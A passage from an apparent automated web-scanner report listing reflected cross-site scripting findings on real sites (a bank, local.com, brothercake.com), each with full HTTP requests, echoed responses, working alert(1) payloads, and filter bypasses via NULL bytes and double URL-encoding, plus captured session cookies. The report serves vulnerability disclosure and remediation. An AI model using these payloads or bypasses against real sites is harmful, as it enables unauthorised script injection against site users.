HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 218
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1"></
...[SNIP]...

4.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 211
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1"></head></
...[SNIP]...

4.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/vcsp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 212
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1"></head><
...[SNIP]...

4.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brothercake.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:32 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...
<form id="stylesForm" action="/?350fe\"><script>alert(1)</script>79cd7322848=1" method="post">
...[SNIP]...

4.455. http://www.local.com/dart/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

4.456. http://www.local.com/dart/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

4.457. http://www.local.com/dart/ [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

4.458. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.459. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

4.460. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

4.461. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
